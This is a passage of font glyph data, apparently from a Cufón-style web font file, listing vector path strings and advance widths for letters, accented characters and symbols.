54v25,-1,31,25,52,28xm42,-50v0,47,80,20,99,2r13,-56v-51,6,-112,2,-112,54xm56,-192v54,-15,156,-22,137,59r-31,133r-32,0r4,-21v-27,29,-130,45,-127,-23v3,-76,76,-81,152,-86v10,-30,-10,-43,-42,-43v-21,0,-50,10,-67,14","w":216},{"d":"188,-267v82,0,152,71,152,152v0,81,-71,152,-152,152v-81,0,-152,-70,-152,-152v0,-82,70,-152,152,-152xm188,17v70,0,131,-62,131,-132v0,-71,-61,-133,-131,-133v-70,0,-132,62,-132,133v0,71,62,132,132,132xm139,-116v-7,65,72,71,107,39r3,0r0,32v-61,30,-143,7,-143,-71v0,-75,83,-103,143,-72r0,32v-36,-27,-117,-28,-110,40","w":360},{"d":"175,-316v26,-1,39,-18,46,-44r29,0v-10,37,-36,66,-79,67v-39,1,-59,-28,-53,-67r29,0v-2,26,4,44,28,44xm67,-103v-12,43,1,82,48,80v54,-2,72,-35,83,-79r37,-160r35,0v-35,108,-19,263,-161,267v-69,2,-91,-46,-76,-110r36,-157r35,0","w":263},{"d":"235,-262v45,2,69,-5,65,-52r27,0v0,50,-18,71,-62,76v-31,103,-22,243,-156,243v-69,0,-91,-46,-76,-110r36,-157r35,0r-40,177v-18,68,77,80,109,39v40,-53,41,-145,62,-216","w":272},{"d":"195,-316v26,-1,39,-18,45,-44r29,0v-10,37,-36,66,-78,67v-40,1,-59,-28,-54,-67r29,0v-2,27,5,44,29,44xm61,-103v-5,77,79,94,144,68r15,-67r-70,0r7,-30r104,0r-26,113v-30,10,-56,25,-97,24v-69,0,-113,-36,-115,-103v-5,-137,136,-206,258,-145r-8,40r-4,0v-23,-22,-50,-35,-91,-35v-77,0,-112,57,-117,135","w":279},{"d":"41,-123r32,-139r35,0r-26,113r73,-50r-7,30r-73,49r-21,90r131,0r-7,30r-166,0r22,-94r-39,27r7,-30","w":200},{"d":"272,-294r-26,0r-23,-45r-42,45r-29,0r55,-66r40,0xm376,-262r-126,262r-40,0r-8,-217r-101,217r-39,0r-11,-262r35,0r8,218r102,-218r35,0r7,220r104,-220r34,0","w":356},{"d":"189,-175v37,76,-9,180,-99,180v-46,0,-74,-28,-74,-75v0,-88,70,-156,155,-122v32,-5,41,-18,41,-56r27,0v2,45,-17,67,-50,73xm95,-22v52,-3,72,-47,74,-102v0,-31,-15,-51,-45,-50v-52,2,-72,48,-74,102v0,30,16,51,45,50","w":218},{"d":"43,43v31,14,78,3,71,-39v-41,4,-75,-8,-105,-21v5,-12,3,-31,11,-40v36,51,197,44,159,-40v-39,-31,-134,-10,-136,-82v-2,-86,131,-108,202,-68v-4,11,-3,29,-10,37v-34,-43,-185,-37,-147,42v36,33,138,11,136,82v-1,50,-40,76,-83,87v3,54,-48,88,-104,68","w":246},{"d":"40,-165v0,-59,47,-97,109,-97r82,0r-75,326r-26,0r70,-304r-38,0r-70,304r-26,0r39,-168v-38,0,-65,-24,-65,-61","w":228},{"d":"67,-103v-12,43,1,82,48,80v54,-2,72,-35,83,-79r37,-160r35,0v-35,108,-19,263,-161,267v-69,2,-91,-46,-76,-110r36,-157r35,0xm225,-295r-35,0r8,-34r35,0xm152,-295r-35,0r8,-34r35,0","w":263},{"d":"129,-250v27,-1,39,-19,46,-45r29,0v-10,37,-36,67,-79,68v-38,0,-59,-27,-53,-68r29,0v-4,25,4,46,28,45xm42,-50v0,47,80,20,99,2r13,-56v-51,6,-112,2,-112,54xm56,-192v54,-15,156,-22,137,59r-31,133r-32,0r4,-21v-27,29,-130,45,-127,-23v3,-76,76,-81,152,-86v10,-30,-10,-43,-42,-43v-21,0,-50,10,-67,14","w":216},{"d":"251,-38r-19,20r-77,-78r-77,78r-19,-20r77,-77r-77,-76r19,-20r77,78r77,-78r19,20r-77,76","w":294},{"d":"217,-154v0,76,-66,104,-156,97r-14,57r-35,0r61,-262r35,0r-11,48v62,-1,120,1,120,60xm67,-85v62,3,111,-7,113,-63v0,-43,-47,-38,-90,-38","w":217},{"d":"236,-294r-26,0r-23,-45r-43,45r-28,0r55,-66r40,0xm134,-24v44,0,70,-22,98,-36r-9,40v-68,43,-200,32,-200,-74v0,-133,126,-212,243,-149r-8,39r-3,0v-18,-20,-44,-34,-82,-34v-75,0,-110,60,-112,137v-1,49,25,77,73,77","w":251},{"d":"205,0r-205,0r8,-32r202,-200r-153,0r7,-30r195,0r-7,30r-204,202r163,0xm222,-361r-63,66r-27,0r44,-66r46,0","w":246},{"d":"254,-360r-55,66r-40,0r-25,-66r28,0r22,45r43,-45r27,0xm134,-24v44,0,70,-22,98,-36r-9,40v-68,43,-200,32,-200,-74v0,-133,126,-212,243,-149r-8,39r-3,0v-18,-20,-44,-34,-82,-34v-75,0,-110,60,-112,137v-1,49,25,77,73,77","w":251},{"d":"233,-360r-55,66r-40,0r-25,-66r28,0r22,45r43,-45r27,0xm73,-262v103,-5,198,3,194,101v-4,101,-70,165,-184,161r-71,0xm54,-29v109,9,176,-33,176,-129v0,-67,-56,-79,-129,-75","w":275},{"d":"245,-262r-7,30r-137,0r-17,74r137,0r-6,29r-138,0r-23,99r138,0r-7,30r-173,0r61,-262r172,0xm222,-361r-63,66r-27,0r44,-66r46,0"},{"d":"245,-262r-7,30r-137,0r-17,74r137,0r-6,29r-138,0r-23,99r138,0r-7,30r-173,0r61,-262r172,0xm218,-295r-35,0r8,-34r35,0xm145,-295r-35,0r8,-34r35,0"},{"d":"42,-50v0,47,80,20,99,2r13,-56v-51,6,-112,2,-112,54xm56,-192v54,-15,156,-22,137,59r-31,133r-32,0r4,-21v-27,29,-130,45,-127,-23v3,-76,76,-81,152,-86v10,-30,-10,-43,-42,-43v-21,0,-50,10,-67,14xm198,-295r-63,66r-27,0r44,-66r46,0","w":216},{"d":"206,69v-52,20,-97,-21,-66,-69r5,-22v-39,42,-141,38,-121,-47r30,-127r33,0r-30,141v0,52,74,24,94,5r34,-146r33,0r-45,196v-21,6,-20,55,12,48v9,0,20,-4,27,-6"},{"d":"237,-301r-149,0r6,-26r149,0xm222,0r-36,0r-8,-74r-113,0r-43,74r-37,0r156,-262r46,0xm174,-102r-17,-129r-76,129r93,0","w":245},{"d":"234,-294r-27,0r-22,-45r-43,45r-28,0r54,-66r40,0xm175,-267v62,-2,102,36,100,98v-4,99,-51,171,-152,174v-62,2,-100,-36,-99,-98v3,-101,52,-170,151,-174xm129,-23v75,0,107,-64,109,-141v1,-46,-24,-75,-68,-75v-75,0,-107,65,-110,141v-2,46,24,75,69,75","w":283},{"d":"188,-169v32,-43,144,-51,144,30v0,13,-3,27,-6,40r-144,0v-10,44,10,76,55,76v29,0,56,-16,76,-25r-7,36v-45,21,-130,27,-151,-20v-27,35,-146,64,-146,-11v0,-75,74,-78,148,-81v9,-32,-5,-49,-43,-49v-23,0,-48,9,-66,14r6,-33v41,-11,122,-19,134,23xm299,-123v13,-53,-50,-67,-84,-39v-12,9,-21,23,-27,39r111,0xm44,-50v8,48,84,19,104,-2v-1,-17,-1,-31,2,-47v-48,2,-104,1,-106,49","w":343},{"d":"299,-262r-184,262r-29,0r183,-262r30,0xm334,-39r-29,0r-9,39r-27,0r9,-39r-84,0r7,-32r107,-96r27,0r-25,105r29,0xm284,-62r17,-71r-81,71r64,0xm154,-151v0,61,-85,69,-135,47v4,-9,2,-23,9,-29v20,20,95,27,95,-16v0,-24,-32,-20,-57,-20r5,-24v32,2,61,-4,62,-31v-7,-37,-69,-12,-88,-2r7,-30v34,-14,111,-22,112,24v2,29,-23,38,-41,50v16,4,30,13,31,31","w":360},{"d":"236,-294r-27,0r-23,-45r-42,45r-29,0r55,-66r40,0xm273,-262r-60,262r-35,0r30,-129r-131,0r-30,129r-35,0r61,-262r35,0r-24,104r130,0r24,-104r35,0","w":270},{"d":"59,-63v-15,43,34,44,61,33r-6,28v-48,17,-104,1,-89,-62r25,-106r-22,0r6,-26r22,0r13,-57r33,0r-13,57r68,0r-6,26r-68,0xm207,-316r-64,87r-23,0r47,-87r40,0","w":141},{"d":"127,20r-30,54r-26,0r17,-54r39,0xm224,-86v-2,96,-139,109,-215,69v5,-12,3,-31,11,-40v36,51,197,44,159,-40v-39,-31,-134,-10,-136,-82v-2,-86,131,-108,202,-68v-4,11,-3,29,-10,37v-34,-43,-185,-37,-147,42v36,33,137,11,136,82","w":246},{"d":"274,-202v60,-3,78,52,61,107r-142,0v-9,42,13,72,55,72v28,0,54,-14,74,-24r-7,35v-45,22,-130,26,-148,-23v-21,23,-42,40,-80,40v-46,1,-74,-28,-72,-74v2,-74,39,-133,112,-133v34,0,54,15,64,42v20,-21,45,-40,83,-42xm307,-120v8,-31,-6,-58,-39,-56v-35,2,-62,26,-70,56r109,0xm93,-22v52,0,70,-49,72,-104v1,-31,-14,-48,-43,-48v-45,0,-73,52,-72,102v0,31,13,50,43,50","w":352},{"d":"137,-99r-110,0r7,-31r110,0","w":163},{"d":"215,-235r-149,0r6,-27r149,0xm61,-85v-7,29,-8,63,29,60v22,-2,46,-14,61,-25r34,-146r33,0r-45,196r-33,0r5,-22v-39,42,-141,38,-121,-47r30,-127r33,0"},{"d":"65,43v32,14,77,3,72,-38v-68,0,-112,-37,-114,-103v-5,-137,136,-206,258,-145r-8,40r-4,0v-23,-22,-50,-35,-91,-35v-77,0,-112,57,-117,135v-5,77,79,94,144,68r15,-67r-70,0r7,-30r104,0r-26,113v-23,8,-44,18,-71,22v0,53,-49,84,-104,66","w":279},{"d":"103,-274v18,31,37,70,36,118v-2,108,-55,173,-113,228v-13,-1,-29,2,-40,-1v59,-48,119,-116,121,-220v1,-53,-19,-93,-41,-125r37,0","w":163},{"d":"42,-50v0,47,80,20,99,2r13,-56v-51,6,-112,2,-112,54xm196,69v-52,20,-97,-21,-66,-69r4,-21v-27,29,-130,45,-127,-23v3,-76,76,-81,152,-86v10,-30,-10,-43,-42,-43v-21,0,-50,10,-67,14r6,-33v53,-15,156,-23,137,59r-31,133v-20,8,-18,55,13,48v9,0,20,-4,27,-6","w":216},{"d":"207,-322v14,0,20,-14,23,-28r21,0v-8,30,-19,52,-50,54v-26,1,-31,-26,-52,-29v-13,2,-20,13,-22,29r-22,0v6,-30,21,-52,50,-53v27,-2,29,27,52,27xm67,-103v-12,43,1,82,48,80v54,-2,72,-35,83,-79r37,-160r35,0v-35,108,-19,263,-161,267v-69,2,-91,-46,-76,-110r36,-157r35,0","w":263},{"d":"105,0r-104,0r6,-25r34,0r49,-211r-34,0r6,-26r103,0r-5,26r-35,0r-49,211r35,0xm176,-295r-35,0r8,-34r35,0xm103,-295r-35,0r8,-34r35,0","w":151},{"d":"118,-175v41,-42,141,-36,121,48r-30,127r-33,0r30,-142v-1,-53,-74,-23,-94,-5r-34,147r-33,0r45,-196r33,0xm112,-274r-70,99r-25,0r52,-99r43,0","w":262},{"d":"230,-96v0,65,-50,97,-122,96r-96,0r61,-262v66,5,160,-20,162,47v2,35,-24,56,-48,68v26,6,43,22,43,51xm83,-156v56,2,115,3,115,-49v0,-40,-58,-25,-97,-28xm54,-28v71,2,140,2,140,-65v0,-47,-69,-32,-117,-35","w":246},{"d":"173,-151v0,61,-85,69,-135,47v4,-9,2,-23,9,-29v20,20,95,27,95,-16v0,-24,-32,-20,-57,-20r5,-24v32,2,61,-4,62,-31v-7,-37,-69,-12,-88,-2r7,-30v34,-14,111,-22,112,24v2,29,-23,38,-41,50v16,4,30,13,31,31","w":195},{"d":"89,-196r-46,196r-33,0r45,-196r34,0","w":98},{"d":"334,-101r-306,0r6,-28r306,0","w":360},{"d":"50,-75v0,72,87,53,119,26r-7,37v-54,29,-147,21,-147,-57v0,-98,89,-162,179,-116v-4,11,-2,28,-9,36v-13,-13,-31,-24,-58,-24v-48,0,-77,48,-77,98xm194,-295r-63,66r-27,0r44,-66r46,0","w":187},{"d":"66,-31v66,35,123,-50,97,-124xm153,-166v-66,-36,-124,53,-97,124xm203,-127v2,89,-71,158,-157,121r-25,32r-19,0r33,-42v-13,-12,-20,-30,-20,-54v-3,-88,74,-159,157,-120r22,-28r19,0r-29,37v12,12,19,30,19,54","w":218},{"d":"136,-295r-38,0r8,-34r37,0xm105,0r-104,0r6,-25r34,0r49,-211r-34,0r6,-26r103,0r-5,26r-35,0r-49,211r35,0","w":151},{"d":"173,-256v13,-1,20,-15,23,-29r22,0v-9,30,-19,52,-51,54v-27,2,-30,-26,-52,-28v-14,1,-19,14,-22,29r-22,0v6,-29,22,-52,50,-54v25,-2,31,25,52,28xm61,-85v-7,29,-8,63,29,60v22,-2,46,-14,61,-25r34,-146r33,0r-45,196r-33,0r5,-22v-39,42,-141,38,-121,-47r30,-127r33,0"},{"d":"206,-235r-149,0r6,-27r150,0xm129,-202v46,0,75,28,74,75v-2,75,-37,130,-113,132v-46,1,-75,-28,-74,-75v3,-75,40,-132,113,-132xm95,-22v52,-3,72,-47,74,-102v0,-31,-15,-51,-45,-50v-52,2,-72,48,-74,102v0,30,16,51,45,50","w":218},{"d":"149,-229r-38,0r8,-34r38,0xm15,-70v0,-91,80,-161,164,-118v2,-13,22,-7,35,-8v-37,111,-14,294,-182,268v-10,-2,-19,-3,-28,-6v4,-10,2,-26,9,-33v37,17,106,19,118,-21v4,-12,8,-25,11,-39v-40,39,-127,32,-127,-43xm50,-76v0,59,69,48,98,22r25,-107v-62,-34,-123,13,-123,85","w":223},{"d":"183,-274r-184,327r-32,0r184,-327r32,0","w":163},{"d":"105,0r-104,0r6,-25r34,0r49,-211r-34,0r6,-26r103,0r-5,26r-35,0r-49,211r35,0xm121,-316v26,-1,37,-18,44,-44r29,0v-10,36,-34,66,-77,67v-40,1,-58,-29,-52,-67r29,0v-1,26,3,45,27,44","w":151},{"d":"45,72r-36,0r57,-83r-35,-185r34,0r27,146r94,-146r36,0xm198,-295r-63,66r-27,0r44,-66r46,0","w":212},{"d":"225,-360r-56,66r-40,0r-25,-66r29,0r22,45r42,-45r28,0xm253,-232r-94,0r-53,232r-35,0r53,-232r-93,0r7,-30r221,0","w":221},{"d":"60,-240v25,1,41,-2,47,-22r24,0r-37,163r-29,0r27,-121r-36,0xm277,-262r-183,262r-29,0r183,-262r29,0xm312,-120v-5,-38,-64,-17,-84,-6r6,-30v36,-16,113,-20,111,30v-3,56,-61,77,-100,102r91,0r-6,25r-127,0r6,-28v36,-27,97,-43,103,-93","w":360},{"d":"198,-295r-38,0r8,-34r38,0xm61,-103v-5,77,79,94,144,68r15,-67r-70,0r7,-30r104,0r-26,113v-30,10,-56,25,-97,24v-69,0,-113,-36,-115,-103v-5,-137,136,-206,258,-145r-8,40r-4,0v-23,-22,-50,-35,-91,-35v-77,0,-112,57,-117,135","w":279},{"d":"253,-301r-150,0r7,-26r149,0xm175,-267v62,-2,102,36,100,98v-4,99,-51,171,-152,174v-62,2,-100,-36,-99,-98v3,-101,52,-170,151,-174xm129,-23v75,0,107,-64,109,-141v1,-46,-24,-75,-68,-75v-75,0,-107,65,-110,141v-2,46,24,75,69,75","w":283},{"d":"176,-295r-37,0r7,-34r38,0xm205,0r-205,0r8,-32r202,-200r-153,0r7,-30r195,0r-7,30r-204,202r163,0","w":246},{"d":"106,-263r-8,34r-37,0r8,-34r37,0xm89,-196r-46,196r-33,0r46,-196r33,0xm221,-229r-37,0r8,-34r37,0xm57,39v27,15,65,3,72,-26r43,-183r-41,0r6,-26r74,0r-46,201v-9,53,-54,82,-115,64","w":220},{"d":"156,-92v40,63,-51,117,-124,91v-12,-4,-21,-7,-29,-11v4,-11,2,-28,9,-36v22,27,116,45,119,-10v-11,-44,-104,-11,-104,-74v0,-69,100,-84,155,-54v-4,10,-2,27,-9,34v-23,-32,-137,-30,-104,27v21,16,73,11,87,33xm175,-295r-63,66r-27,0r44,-66r46,0","w":187},{"w":126},{"d":"178,-294r-26,0r-23,-45r-43,45r-28,0r54,-66r41,0xm105,0r-104,0r6,-25r34,0r49,-211r-34,0r6,-26r103,0r-5,26r-35,0r-49,211r35,0","w":151},{"d":"257,-262r-125,147r-27,115r-35,0r26,-111r-59,-151r38,0r45,118r99,-118r38,0","w":221},{"d":"179,69v-57,21,-93,-24,-68,-69r-99,0r61,-262r172,0r-7,30r-137,0r-17,74r137,0r-6,29r-138,0r-23,99r138,0r-7,30r-47,0v-11,19,-11,48,20,48v9,0,20,-4,27,-6"},{"d":"105,0r-104,0r6,-25r34,0r49,-211r-34,0r6,-26r103,0r-5,26r-35,0r-49,211r35,0xm153,-295r-25,0r-35,-66r42,0","w":151},{"d":"73,-86v-10,-15,-12,-46,0,-60r-41,-41r19,-20r42,42v13,-12,44,-12,59,-1r41,-41r20,19r-41,42v11,14,10,45,0,60r41,41r-19,19r-42,-41v-14,12,-45,10,-60,0r-41,42r-19,-20xm122,-84v18,0,32,-15,32,-32v0,-17,-14,-34,-32,-33v-17,0,-31,15,-31,33v0,16,13,32,31,32","w":228},{"d":"152,-229r-37,0r8,-34r37,0xm169,-120v15,-57,-52,-70,-86,-40v-12,11,-21,23,-26,40r112,0xm52,-95v-22,85,90,82,132,47r-7,36v-58,29,-162,23,-162,-59v0,-67,52,-131,119,-131v61,0,79,51,63,107r-145,0","w":214},{"d":"129,-202v46,0,75,28,74,75v-2,75,-37,130,-113,132v-46,1,-75,-28,-74,-75v3,-75,40,-132,113,-132xm95,-22v52,-3,72,-47,74,-102v0,-31,-15,-51,-45,-50v-52,2,-72,48,-74,102v0,30,16,51,45,50","w":218},{"d":"92,-50r-77,115r-25,0r57,-115r45,0","w":130},{"d":"253,-232r-94,0r-53,232r-35,0r53,-232r-93,0r7,-30r221,0","w":221},{"d":"83,-175v40,-43,141,-36,121,48r-30,127r-33,0r30,-142v-1,-53,-74,-23,-94,-5r-34,147r-33,0r45,-196r33,0xm12,43v36,14,79,3,72,-47r28,0v3,59,-46,92,-105,73"},{"d":"105,0r-104,0r6,-25r34,0r49,-211r-34,0r6,-26r103,0r-5,26r-35,0r-49,211r35,0xm181,-361r-63,66r-27,0r44,-66r46,0","w":151},{"d":"151,-202v39,0,58,28,58,68v0,94,-77,167,-164,124r-19,82r-33,0r62,-268r33,0r-5,20v20,-13,38,-26,68,-26xm98,-25v55,0,74,-47,77,-103v3,-61,-70,-46,-98,-20r-26,111v15,7,25,12,47,12","w":224},{"d":"138,-250v27,-1,39,-19,46,-45r29,0v-10,37,-36,67,-79,68v-38,0,-59,-27,-53,-68r29,0v-4,25,4,46,28,45xm169,-120v15,-57,-52,-70,-86,-40v-12,11,-21,23,-26,40r112,0xm52,-95v-22,85,90,82,132,47r-7,36v-58,29,-162,23,-162,-59v0,-67,52,-131,119,-131v61,0,79,51,63,107r-145,0","w":214},{"d":"179,-295r-38,0r8,-34r38,0xm245,-262r-7,30r-137,0r-17,74r137,0r-6,29r-138,0r-23,99r138,0r-7,30r-173,0r61,-262r172,0"},{"d":"105,20r-30,54r-26,0r17,-54r39,0xm253,-232r-94,0r-53,232r-35,0r53,-232r-93,0r7,-30r221,0","w":221},{"d":"210,-274r-71,99r-24,0r52,-99r43,0xm139,-274r-71,99r-24,0r52,-99r43,0","w":165},{"d":"169,-316v26,-1,39,-18,46,-44r29,0v-10,37,-36,66,-79,67v-39,1,-59,-28,-53,-67r29,0v-2,26,4,44,28,44xm222,0r-36,0r-8,-74r-113,0r-43,74r-37,0r156,-262r46,0xm174,-102r-17,-129r-76,129r93,0","w":245},{"d":"105,0r-104,0r6,-25r34,0r49,-211r-34,0r6,-26r103,0r-5,26r-35,0r-49,211r35,0","w":151},{"d":"67,-103v-12,43,1,82,48,80v54,-2,72,-35,83,-79r37,-160r35,0v-35,108,-19,263,-161,267v-69,2,-91,-46,-76,-110r36,-157r35,0","w":263},{"d":"66,-31v66,35,123,-50,97,-124xm153,-166v-66,-36,-124,53,-97,124xm203,-127v2,89,-71,158,-157,121r-25,32r-19,0r33,-42v-13,-12,-20,-30,-20,-54v-3,-88,74,-159,157,-120r22,-28r19,0r-29,37v12,12,19,30,19,54xm202,-295r-63,66r-27,0r44,-66r46,0","w":218},{"d":"76,20r-31,54r-26,0r18,-54r39,0xm59,-63v-15,43,34,44,61,33r-6,28v-48,17,-104,1,-89,-62r25,-106r-22,0r6,-26r22,0r13,-57r33,0r-13,57r68,0r-6,26r-68,0","w":141},{"d":"198,-91v2,90,-114,118,-188,78r8,-33v20,8,41,22,72,22v41,0,72,-28,72,-67v0,-34,-31,-39,-69,-37r7,-28v44,3,84,-12,84,-51v0,-54,-93,-25,-122,-8r7,-36v45,-21,150,-30,152,35v1,41,-37,63,-68,74v24,6,45,20,45,51","w":228},{"d":"243,-294r-27,0r-23,-45r-42,45r-29,0r55,-66r40,0xm61,-103v-5,77,79,94,144,68r15,-67r-70,0r7,-30r104,0r-26,113v-30,10,-56,25,-97,24v-69,0,-113,-36,-115,-103v-5,-137,136,-206,258,-145r-8,40r-4,0v-23,-22,-50,-35,-91,-35v-77,0,-112,57,-117,135","w":279},{"d":"42,-50v0,47,80,20,99,2r13,-56v-51,6,-112,2,-112,54xm56,-192v54,-15,156,-22,137,59r-31,133r-32,0r4,-21v-27,29,-130,45,-127,-23v3,-76,76,-81,152,-86v10,-30,-10,-43,-42,-43v-21,0,-50,10,-67,14","w":216},{"d":"81,-167v30,-21,52,-34,95,-27v-4,10,-4,23,-9,32v-37,-10,-70,7,-92,23r-32,139r-33,0r45,-196r33,0xm174,-295r-63,66r-27,0r44,-66r46,0","w":153},{"d":"59,-63v-15,43,34,44,61,33r-6,28r-11,3v3,55,-48,87,-104,68v3,-8,3,-19,7,-26v31,14,77,3,70,-39v-42,3,-61,-26,-51,-68r25,-106r-22,0r6,-26r22,0r13,-57r33,0r-13,57r68,0r-6,26r-68,0","w":141},{"d":"89,-196r-46,196r-33,0r45,-196r34,0xm100,-229r-25,0r-35,-66r42,0","w":98},{"d":"194,-228r-26,0r-23,-46r-43,46r-28,0r55,-67r40,0xm15,-70v0,-91,80,-161,164,-118v2,-13,22,-7,35,-8v-37,111,-14,294,-182,268v-10,-2,-19,-3,-28,-6v4,-10,2,-26,9,-33v37,17,106,19,118,-21v4,-12,8,-25,11,-39v-40,39,-127,32,-127,-43xm50,-76v0,59,69,48,98,22r25,-107v-62,-34,-123,13,-123,85","w":223},{"d":"276,-262r-156,262r-46,0r-35,-262r36,0r29,230r135,-230r37,0","w":245},{"d":"101,70v-55,19,-84,-30,-58,-70r-42,0r6,-25r34,0r49,-211r-34,0r6,-26r103,0r-5,26r-35,0r-49,211r35,0r-6,25r-35,0v-8,16,-17,53,15,48v9,1,17,-4,23,-5","w":151},{"d":"169,-120v15,-57,-52,-70,-86,-40v-12,11,-21,23,-26,40r112,0xm52,-95v-22,85,90,82,132,47r-7,36v-58,29,-162,23,-162,-59v0,-67,52,-131,119,-131v61,0,79,51,63,107r-145,0xm200,-295r-63,66r-27,0r44,-66r46,0","w":214},{"d":"95,69r-91,0r79,-343r91,0r-5,24r-61,0r-68,295r60,0","w":163},{"d":"78,-132v64,4,114,-7,114,-65v0,-42,-49,-36,-91,-36xm230,-205v0,47,-35,81,-74,92r75,113r-41,0r-69,-105r-49,0r-25,105r-35,0r61,-262v71,1,156,-13,157,57xm213,-361r-63,66r-27,0r44,-66r46,0","w":250},{"d":"188,-229r-35,0r8,-34r35,0xm115,-229r-35,0r8,-34r35,0","w":228},{"d":"138,-250v26,-1,39,-19,45,-45r29,0v-10,38,-36,68,-79,68v-38,0,-58,-27,-53,-68r29,0v-2,27,4,46,29,45xm15,-70v0,-91,80,-161,164,-118v2,-13,22,-7,35,-8v-37,111,-14,294,-182,268v-10,-2,-19,-3,-28,-6v4,-10,2,-26,9,-33v37,17,106,19,118,-21v4,-12,8,-25,11,-39v-40,39,-127,32,-127,-43xm50,-76v0,59,69,48,98,22r25,-107v-62,-34,-123,13,-123,85","w":223},{"d":"168,-243v-40,-11,-69,0,-78,40r-46,203r-33,0r46,-203v9,-54,53,-83,118,-69","w":108},{"d":"107,43v39,10,69,-8,73,-41r-81,-236r-54,234r-33,0r61,-262r52,0r69,200r46,-200r33,0r-62,266v-10,52,-49,79,-111,68","w":269},{"d":"15,-70v0,-91,80,-161,164,-118v2,-13,22,-7,35,-8v-37,111,-14,294,-182,268v-10,-2,-19,-3,-28,-6v4,-10,2,-26,9,-33v37,17,106,19,118,-21v4,-12,8,-25,11,-39v-40,39,-127,32,-127,-43xm50,-76v0,59,69,48,98,22r25,-107v-62,-34,-123,13,-123,85","w":223},{"d":"89,-196r-46,196r-33,0r46,-196r33,0xm80,-248v21,-1,26,-17,31,-40r26,0v-8,33,-24,60,-61,61v-32,1,-45,-29,-37,-61r25,0v-3,18,-4,41,16,40","w":98},{"d":"226,0r-41,0r-81,-117r-36,31r-20,86r-35,0r61,-262r35,0r-32,136r154,-136r44,0r-143,126","w":249},{"d":"187,-228r-27,0r-23,-46r-42,46r-28,0r54,-67r40,0xm45,72r-36,0r57,-83r-35,-185r34,0r27,146r94,-146r36,0","w":212},{"d":"79,-226v38,0,60,-9,69,-37r28,0r-55,238r54,0r-6,25r-142,0r6,-25r54,0r41,-178r-54,0","w":228},{"d":"248,-301r-149,0r6,-26r149,0xm67,-103v-12,43,1,82,48,80v54,-2,72,-35,83,-79r37,-160r35,0v-35,108,-19,263,-161,267v-69,2,-91,-46,-76,-110r36,-157r35,0","w":263},{"d":"259,-137r-208,0r0,-29r208,0r0,29xm259,-64r-208,0r0,-28r208,0r0,28","w":294},{"d":"185,-294r-27,0r-23,-45r-42,45r-29,0r55,-66r40,0xm-6,-33v33,13,84,10,92,-25r42,-177r-57,0r6,-27r92,0r-44,194v-10,58,-70,83,-139,67","w":163},{"d":"280,-314r-5,21r-231,0r5,-21r231,0","w":228},{"d":"37,-169v22,-72,123,-127,206,-78v-4,12,-3,30,-10,39v-38,-50,-131,-28,-150,23v-2,5,-7,10,-9,16r70,0r-7,20r-70,0v-2,9,-6,23,-6,34r63,0r-8,21r-55,0v1,41,23,69,62,70v35,0,63,-18,86,-32r-8,40v-68,42,-185,18,-178,-78r-23,0r8,-21r16,0r6,-34r-23,0r8,-20r22,0","w":228},{"d":"209,-235r-150,0r7,-27r149,0xm169,-120v15,-57,-52,-70,-86,-40v-12,11,-21,23,-26,40r112,0xm52,-95v-22,85,90,82,132,47r-7,36v-58,29,-162,23,-162,-59v0,-67,52,-131,119,-131v61,0,79,51,63,107r-145,0","w":214},{"d":"246,0r-35,0r51,-222r-106,150r-21,0r-37,-157r-53,229r-33,0r61,-262r48,0r35,146r102,-146r48,0","w":303},{"d":"137,-99r-110,0r7,-31r110,0","w":163},{"d":"-6,-33v33,13,84,10,92,-25r42,-177r-57,0r6,-27r92,0r-44,194v-10,58,-70,83,-139,67","w":163},{"d":"83,69r-91,0r5,-24r61,0r68,-295r-61,0r6,-24r91,0","w":163},{"d":"106,-263r-8,34r-37,0r8,-34r37,0xm64,70v-44,14,-85,-13,-64,-58v3,-8,8,-16,14,-26r41,-182r34,0r-46,196v-19,-4,-17,18,-19,30v-3,23,32,20,46,13","w":98},{"d":"150,-267v49,0,71,27,71,77v0,89,-30,195,-127,195v-49,0,-71,-27,-71,-76v0,-87,29,-197,127,-196xm99,-22v72,0,86,-103,86,-169v0,-31,-9,-48,-40,-48v-73,0,-86,102,-86,168v0,31,10,49,40,49","w":228},{"d":"134,-24v44,0,70,-22,98,-36r-9,40v-68,43,-200,32,-200,-74v0,-133,126,-212,243,-149r-8,39r-3,0v-18,-20,-44,-34,-82,-34v-75,0,-110,60,-112,137v-1,49,25,77,73,77xm243,-361r-63,66r-27,0r44,-66r46,0","w":251},{"d":"23,-102v4,-102,69,-160,185,-160r195,0r-7,30r-134,0r-17,74r134,0r-7,29r-134,0r-23,99r134,0r-7,30v-133,-7,-325,38,-319,-102xm60,-104v0,65,51,79,120,75r47,-204v-104,-8,-167,37,-167,129","w":385},{"d":"42,-50v0,47,82,19,99,2r13,-56v-53,4,-112,2,-112,54xm163,-196v25,6,37,31,30,63r-30,133r-33,0r4,-21v-27,29,-130,45,-127,-23v3,-76,76,-81,152,-86v11,-29,-10,-43,-42,-43v-23,0,-49,9,-67,14r6,-33r37,-7v-25,-31,9,-75,47,-72v45,-5,56,58,23,75xm131,-203v28,3,39,-47,6,-46v-28,-3,-39,47,-6,46xm204,-324r-55,48r-27,0r38,-48r44,0","w":216},{"d":"224,-86v-2,96,-139,109,-215,69v5,-12,3,-31,11,-40v36,51,197,44,159,-40v-39,-31,-134,-10,-136,-82v-2,-86,131,-108,202,-68v-4,11,-3,29,-10,37v-34,-43,-185,-37,-147,42v36,33,137,11,136,82","w":246},{"d":"114,-146r-42,0r11,-50r43,0xm106,-50r-76,115r-26,0r57,-115r45,0","w":163},{"d":"224,-294r-27,0r-23,-45r-42,45r-28,0r54,-66r40,0xm245,-262r-7,30r-137,0r-17,74r137,0r-6,29r-138,0r-23,99r138,0r-7,30r-173,0r61,-262r172,0"},{"d":"205,0r-205,0r8,-32r202,-200r-153,0r7,-30r195,0r-7,30r-204,202r163,0","w":246},{"d":"129,-23v76,0,107,-64,109,-141v1,-46,-24,-75,-68,-75v-75,0,-107,65,-110,141v-2,46,24,75,69,75xm275,-169v0,77,-42,146,-102,165v-11,47,34,49,71,38r-6,30v-49,15,-111,1,-98,-60v-71,8,-120,-30,-117,-97v4,-99,53,-171,152,-174v62,-2,101,35,100,98","w":283},{"d":"73,-262v103,-5,198,3,194,101v-4,101,-70,165,-184,161r-71,0xm54,-29v109,9,176,-33,176,-129v0,-67,-56,-79,-129,-75","w":275},{"d":"209,-294r-27,0r-22,-45r-43,45r-28,0r54,-66r41,0xm257,-262r-125,147r-27,115r-35,0r26,-111r-59,-151r38,0r45,118r99,-118r38,0","w":221},{"d":"112,-132r-60,-130r38,0r47,105r97,-105r39,0r-122,131r61,131r-38,0r-48,-106r-98,106r-39,0","w":246}